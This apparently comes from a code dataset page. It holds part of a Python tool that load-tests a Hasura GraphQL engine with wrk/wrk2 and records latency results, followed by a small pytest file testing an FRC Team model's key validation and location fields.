f.write(json.dumps(tests_info, indent=2))
upload_files([
(x, os.path.join(*tests_path,y))
for (x,y) in [
(summary_file, 'summary.json'),
(latencies_file, 'latencies'),
(histogram_file, 'latencies.hgrm'),
(tests_setup_file, 'test_setup.json')
]
])
if self.upload_root_uri:
latencies_uri = uri_path_join(self.upload_root_uri, *tests_path, 'latencies')
else:
latencies_uri = pathlib.Path(latencies_file).as_uri()
self.insert_result(query, rps, summary, histogram, latencies_uri)
return (summary, histogram)
def get_latency_histogram(self, result, write_histogram_file):
const_true = lambda l : True
state_changes = {
'start' : {
(lambda l: 'Detailed Percentile spectrum' in l) : 'histogram_start'
},
'histogram_start': {
(lambda l: 'Value' in l and 'Percentile' in l): 'histogram_headers'
},
'histogram_headers': {
const_true: 'histogram_empty_line'
},
'histogram_empty_line' : {
const_true: 'histogram_values'
},
'histogram_values': {
(lambda l: l.strip().startswith('#')): 'histogram_summary'
},
'histogram_summary': {
(lambda l: not l.strip().startswith('#')): 'histogram_end'
}
}
state = 'start'
histogram = []
print(Fore.CYAN + "Latency histogram summary" + Style.RESET_ALL)
with open(write_histogram_file, 'w') as f:
for line in result.splitlines():
# Change the state
for (check, next_state) in state_changes[state].items():
if check(line):
state = next_state
break
if state == 'start':
continue
elif state == 'histogram_end':
break
if state == 'histogram_summary':
print(Fore.CYAN + line + Style.RESET_ALL)
if state in ['histogram_headers','histogram_values','histogram_summary']:
f.write(line+'\n')
if state == 'histogram_values':
(val, percentile, total_count, _) = line.strip().split()
histogram.append({
'percentile': float(percentile),
'latency': float(val),
'total_count': float(total_count)
})
return histogram
# The appropriate Lua env vars for execution within wrk container:
def get_lua_env(self):
return {
'LUA_PATH': '/usr/share/lua/5.1/?.lua;' +
os.path.join(self.lua_dir, '?.lua') + ';;',
'LUA_CPATH': '/usr/lib/lua/5.1/?.so;/usr/lib/x86_64-linux-gnu/lua/5.1/?.so;;'
}
def get_scripts_vol(self):
return {
os.path.join(fileLoc, 'wrk-websocket-server', 'bench_scripts'): {
'bind' : self.lua_dir,
'mode' : 'ro'
}
}
def max_rps_test(self, query):
query_str = graphql.print_ast(query)
print(Fore.GREEN + "(Compute maximum Request per second) Running wrk benchmark for query\n", query_str + Style.RESET_ALL)
self.hge.graphql_q(query_str) # Test query once for errors
bench_script = os.path.join(self.lua_dir + '/bench-wrk.lua')
graphql_url = self.hge.url + '/v1/graphql'
params = self.get_wrk2_params()
duration = 30
wrk_command = [
'wrk',
'-t', str(params['threads']),
'-c', str(params['connections']),
'-d', str(duration),
'--latency',
'-s', bench_script,
graphql_url,
query_str
]
self.docker_client = docker.from_env()
result = self.docker_client.containers.run(
self.wrk_docker_image,
detach = False,
stdout = False,
stderr = True,
command = wrk_command,
network_mode = 'host',
environment = self.get_lua_env(),
volumes = self.get_scripts_vol(),
remove = True,
user = self.get_current_user()
)
summary = json.loads(result)['summary']
# TODO explain this calculation. Why aren't we using wrk's reported 'max'? Should we call this avg_sustained_rps or something?
max_rps = round(summary['requests']/float(duration))
self.insert_max_rps_result(query, max_rps)
print("Max RPS", max_rps)
return max_rps
def get_version(self):
script = os.path.join(fileLoc, 'gen-version.sh')
return subprocess.check_output([script]).decode('ascii').strip()
def get_server_shasum(self):
script = os.path.join(fileLoc, 'get-server-sha.sh')
return subprocess.check_output([script]).decode('ascii').strip()
def extract_cpu_info(self):
self.cpu_info = cpuinfo.get_cpu_info()
for k in ['flags', 'python_version', 'hz_actual', 'hz_actual_raw']:
if self.cpu_info.get(k):
del self.cpu_info[k]
def get_results(self):
query = '''
query results {
latency: hge_bench_latest_results {
query_name
requests_per_sec
docker_image
version
latencies_uri
latency_histogram {
percentile
latency
}
}
max_rps: hge_bench_avg_query_max_rps {
query_name
docker_image
version
max_rps
}
}
'''
output = self.results_hge.graphql_q(query)
return output['data']
def set_cpu_info(self, insert_var):
cpu_key = self.cpu_info['brand'] + ' vCPUs: ' + str(self.cpu_info['count'])
insert_var['cpu']= {
'data' : {
'info': self.cpu_info,
'key': cpu_key
},
"on_conflict": {
"constraint": "cpu_info_pkey",
"update_columns": "key"
}
}
def set_query_info(self, insert_var, query):
insert_var["query"] = {
"data": {
"name" : query.name.value,
"query" : graphql.print_ast(query)
},
"on_conflict" : {
"constraint": "gql_query_query_key",
"update_columns": "query"
}
}
#TODO add executable shasum also
def set_version_info(self, insert_var):
if self.hge_docker_image:
insert_var["docker_image"] = self.hge_docker_image
else:
insert_var["version"] = self.get_version()
insert_var["server_shasum"] = self.server_shasum
insert_var['postgres_version'] = self.pg.get_server_version()
if self.scenario_name:
insert_var['scenario_name'] = self.scenario_name
def set_hge_args_env_vars(self, insert_var):
to_hide_env = ['HASURA_GRAPHQL_' + env for env in
[ 'ADMIN_SECRET', 'DATABASE_URL', 'JWT_SECRET']
]
env = { k:v for (k,v) in self.hge.get_hge_env().items() if (k.startswith('HASURA_GRAPHQL') and k not in to_hide_env) or k in ['GHCRTS'] }
args = self.hge.args
insert_var['hge_conf'] = {
'env': env,
'args': args
}
def gen_max_rps_insert_var(self, query, max_rps):
insert_var = dict()
self.set_cpu_info(insert_var)
self.set_query_info(insert_var, query)
self.set_version_info(insert_var)
self.set_hge_args_env_vars(insert_var)
insert_var['max_rps'] = max_rps
insert_var['wrk_parameters'] = self.get_wrk2_params()
return insert_var
def plot_results(self):
def open_plot_in_browser():
time.sleep(1)
webbrowser.open_new_tab('http://127.0.0.1:8050/')
threading.Thread(target=open_plot_in_browser).start()
run_dash_server(self.get_results())
# Collect info about the test environment
def gen_test_info(self, query, rps):
test_info = dict()
self.set_cpu_info(test_info)
self.set_query_info(test_info, query)
self.set_version_info(test_info)
self.set_hge_args_env_vars(test_info)
test_info["requests_per_sec"] = rps
test_info['wrk2_parameters'] = self.get_wrk2_params()
return test_info
def gen_result_insert_var(self, query, rps, summary, latency_histogram, latencies_uri):
insert_var = self.gen_test_info(query, rps)
insert_var["summary"] = summary
insert_var['latency_histogram'] = {
'data' : latency_histogram
}
insert_var['latencies_uri'] = latencies_uri
return insert_var
def insert_result(self, query, rps, summary, latency_histogram, latencies_uri):
result_var = self.gen_result_insert_var(query, rps, summary, latency_histogram, latencies_uri)
insert_query = """
mutation insertResult($result: hge_bench_results_insert_input!) {
insert_hge_bench_results(objects: [$result]){
affected_rows
}
}"""
variables = {'result': result_var}
self.results_hge.graphql_q(insert_query, variables)
def insert_max_rps_result(self, query, max_rps):
result_var = self.gen_max_rps_insert_var(query, max_rps)
insert_query = """
mutation insertMaxRps($result: hge_bench_query_max_rps_insert_input!) {
insert_hge_bench_query_max_rps(objects: [$result]){
affected_rows
}
}"""
variables = {'result': result_var}
self.results_hge.graphql_q(insert_query, variables)
def setup_results_schema(self):
if not self.results_hge_url:
self.results_hge_url = self.hge.url
self.results_hge_admin_secret = self.hge.admin_secret()
if self.results_hge_admin_secret:
results_hge_args = ['--admin-secret', self.results_hge_admin_secret]
else:
results_hge_args = []
self.results_hge = HGE(None, None, args=results_hge_args, log_file=None, url=self.results_hge_url)
results_table = {
'name' : 'results',
'schema': 'hge_bench'
}
if results_table in self.results_hge.get_all_tracked_tables():
return
schema_file = os.path.join(fileLoc, 'results_schema.yaml')
with open(schema_file) as f:
queries = yaml.safe_load(f)
self.results_hge.run_bulk(queries)
def run_query_benchmarks(self):
def get_results_root_dir(query):
if self.hge_docker_image:
ver_info = 'docker-tag-' + self.hge_docker_image.split(':')[1]
else:
ver_info = self.get_version()
query_name = query.name.value
# Store versioned runs under e.g. test_output/benchmark_runs/<hge_version>/
results_root_dir = os.path.abspath(os.path.join(self.work_dir, 'benchmark_runs'))
return os.path.join(results_root_dir, ver_info, query_name)
for query in self.queries:
try:
self.results_root_dir = get_results_root_dir(query)
max_rps = self.max_rps_test(query)
# The tests should definitely not be running very close to or higher than maximum requests per second
rps_steps = [ r for r in self.rps_steps if r < 0.6*max_rps]
print("Benchmarking queries with wrk2 for the following requests/sec", rps_steps)
for rps in rps_steps:
if rps < int(0.6*max_rps):
self.wrk2_test(query, rps)
except Exception:
print(Fore.RED + "Benchmarking Graphql Query '" + query.name.value + "' failed" + Style.RESET_ALL)
raise
def run_tests(self):
with self.graphql_engines_setup():
self.setup_results_schema()
if self.run_benchmarks:
self.run_query_benchmarks()
if not self.skip_plots:
self.plot_results()
class HGEWrkBenchArgs(HGETestSetupArgs):
def __init__(self):
self.set_arg_parse_options()
self.parse_args()
def set_arg_parse_options(self):
HGETestSetupArgs.set_arg_parse_options(self)
self.set_wrk_options()
def parse_args(self):
HGETestSetupArgs.parse_args(self)
self.parse_wrk_options()
def set_wrk_options(self):
def boolean_string(s):
s = s.lower()
if s not in {'false', 'true'}:
raise ValueError('Not a valid boolean string')
return s == 'true'
wrk_opts = self.arg_parser.add_argument_group('wrk')
wrk_opts.add_argument('--queries-file', metavar='HASURA_BENCH_QUERIES_FILE', help='Queries file for benchmarks', default='queries.graphql')
wrk_opts.add_argument('--connections', metavar='HASURA_BENCH_CONNECTIONS', help='Total number of open connections', default=50)
wrk_opts.add_argument('--duration', metavar='HASURA_BENCH_DURATION', help='Duration of tests in seconds', default=300)
wrk_opts.add_argument('--upload-root-uri', metavar='HASURA_BENCH_UPLOAD_ROOT_URI', help='The URI to which the latency results should be uploaded. Curently only s3 is supported', required=False)
wrk_opts.add_argument('--set-scenario-name', metavar='HASURA_BENCH_SCENARIO_NAME', help='Set a name for the test scenario. This will be shown in logs', required=False)
wrk_opts.add_argument('--results-hge-url', metavar='HASURA_BENCH_RESULTS_HGE_URL', help='The GraphQL engine to which the results should be uploaded', required=False)
wrk_opts.add_argument('--results-hge-admin-secret', metavar='HASURA_BENCH_RESULTS_HGE_ADMIN_SECRET', help='Admin secret of the GraphQL engine to which the results should be uploaded', required=False)
wrk_opts.add_argument('--skip-plots', help='Skip plotting', action='store_true', required=False)
wrk_opts.add_argument('--run-benchmarks', metavar='HASURA_BENCH_RUN_BENCHMARKS', help='Whether benchmarks should be run or not', default=True, type=boolean_string)
def get_s3_caller_identity(self):
return boto3.client('sts').get_caller_identity()
def parse_wrk_options(self):
self.connections, self.duration, self.graphql_queries_file, self.res_hge_url, upload_root_uri, self.res_hge_admin_secret, self.run_benchmarks, self.scenario_name = \
self.get_params([
('connections', 'HASURA_BENCH_CONNECTIONS'),
('duration', 'HASURA_BENCH_DURATION'),
('queries_file', 'HASURA_BENCH_QUERIES_FILE'),
('results_hge_url', 'HASURA_BENCH_RESULTS_HGE_URL'),
('upload_root_uri', 'HASURA_BENCH_UPLOAD_ROOT_URI'),
('results_hge_admin_secret', 'HASURA_BENCH_RESULTS_HGE_ADMIN_SECRET'),
('run_benchmarks', 'HASURA_BENCH_RUN_BENCHMARKS'),
('set_scenario_name', 'HASURA_BENCH_SCENARIO_NAME'),
])
self.upload_root_uri = None
if upload_root_uri:
p = urlparse(upload_root_uri)
if p.scheme == 's3':
# Check if aws credentials are set
self.get_s3_caller_identity()
self.upload_root_uri = upload_root_uri
self.skip_plots = self.parsed_args.skip_plots
class HGEWrkBenchWithArgs(HGEWrkBenchArgs, HGEWrkBench):
def __init__(self):
HGEWrkBenchArgs.__init__(self)
HGEWrkBench.__init__(
self,
pg_url = self.pg_url,
remote_pg_url = self.remote_pg_url,
pg_docker_image = self.pg_docker_image,
hge_url = self.hge_url,
remote_hge_url = self.remote_hge_url,
hge_docker_image = self.hge_docker_image,
hge_args = self.hge_args,
skip_stack_build = self.skip_stack_build,
graphql_queries_file = self.graphql_queries_file,
connections = self.connections,
duration = self.duration
)
if __name__ == "__main__":
bench = HGEWrkBenchWithArgs()
bench.run_tests()
|
40828
|
import pytest
from backend.common.models.team import Team
from backend.common.models.tests.util import (
CITY_STATE_COUNTRY_PARAMETERS,
LOCATION_PARAMETERS,
)
@pytest.mark.parametrize("key", ["frc177", "frc1"])
def test_valid_key_names(key: str) -> None:
assert Team.validate_key_name(key) is True
@pytest.mark.parametrize("key", ["bcr077", "frc 011", "frc711\\"])
def test_invalid_key_names(key: str) -> None:
assert Team.validate_key_name(key) is False
def test_key_name() -> None:
team = Team(id="frc254", team_number=254)
assert team.key_name == "frc254"
@pytest.mark.parametrize(LOCATION_PARAMETERS[0], LOCATION_PARAMETERS[1])
def test_location(
city: str, state: str, country: str, postalcode: str, output: str
) -> None:
team = Team(
city=city,
state_prov=state,
country=country,
postalcode=postalcode,
)
assert team.location == output
@pytest.mark.parametrize(
CITY_STATE_COUNTRY_PARAMETERS[0], CITY_STATE_COUNTRY_PARAMETERS[1]
)
def test_city_state_country(city: str, state: str, country: str, output: str) -> None:
team = Team(
city=city,
state_prov=state,
country=country,
)
assert team.city_state_country == output
def test_details_url() -> None:
team = Team(
id="frc254",
team_number=254,
)
assert team.details_url == "/team/254"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.